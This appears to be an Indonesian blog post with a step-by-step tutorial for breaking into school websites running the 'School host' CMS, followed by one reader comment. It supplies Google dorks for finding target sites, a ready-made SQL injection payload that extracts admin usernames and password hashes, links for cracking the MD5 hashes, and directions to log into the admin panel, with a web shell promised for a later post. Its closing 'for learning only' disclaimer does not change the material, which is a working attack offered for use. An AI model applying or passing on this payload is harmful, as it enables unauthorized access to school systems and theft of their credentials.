hallo para master , sebelumnya saya minta maaf kalo Post ini penuh kekurangan
CMS school host yang banyak digunakan website sch.id atau website sekolah ini memiliki bug yang cukup beresiko, simak tutorial berikut
Bahan
1. Dork
# inurl:"/?p=info" site:id
# inurl:"/?p=detberita"
# inurl:"/?p=guru" site:id
# inurl:/?p=bukutamu
# intext:Schoolhos Free Open Source CMS
Kembangkan , jangan manja , gunakan otak kalian !
2. Sql Exploit
' and
%40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x))
/*!50000union*/ /*!50000select*/
1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
3. MD5 hash
www.md5online.org/
https://hashkiller.co.uk/
md5cracker.org/
www.md5hashgenerator.com/
Langkah Tutorial
1. Dorking di GOOGLE
cari terus , jangan malas
2. pilih target
3. masukan exploit
ex: www.target.domain
/?p=detberita&id=5'
and
%40x%3A%3Dconcat%2F**_**%2F((select(@x)from(select(@x:=0x00),(select(0)from(sh_users)where(0x00)in(@x:=concat+(@x,0x3c62723e,s_username,0x203a3a20,sandiusers))))x))
/*!50000union*/ /*!50000select*/
1,@x,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
4.kalo vuln maka akan seperti ini
disamping user ada angka angka Contoh admin30017008 hiraukan saja
5. Copy MD5 hash tadi , buka MD5 decrypter, masukan di situ , submit
6. login ke page admin nya : http://terget.domain/adminpanel
masukan user dan password
selesai ..
mau tanam shell ? tunggu post berikutnya
Catatan : Perlu di ingat cms ini digunakan banyak sekolah , saya mohon jangan mendeface situs situs sekolah , apalagi sampai tembas index, terus dimasukin archive
pengen tenar ? pengen di puji ? lo cari ilmu apa cari muka ! kalo pengen tenar buat tool jangan merusak
gsk usah show off defacean , admin tidak bertanggung jawab jika ada masalah , ini hanya sekedar penmbelajaran untuk para newbie
wah mantab tuh ilmunya klu beneran bs mah
ReplyDeletecoba cek http://idamnuriqbal.id apa ada kelemahannya gan masta, klu ada mohon info dmana letak kelemahannya. agar dapat saya perbaiki
terima kasih.
salam
orang awam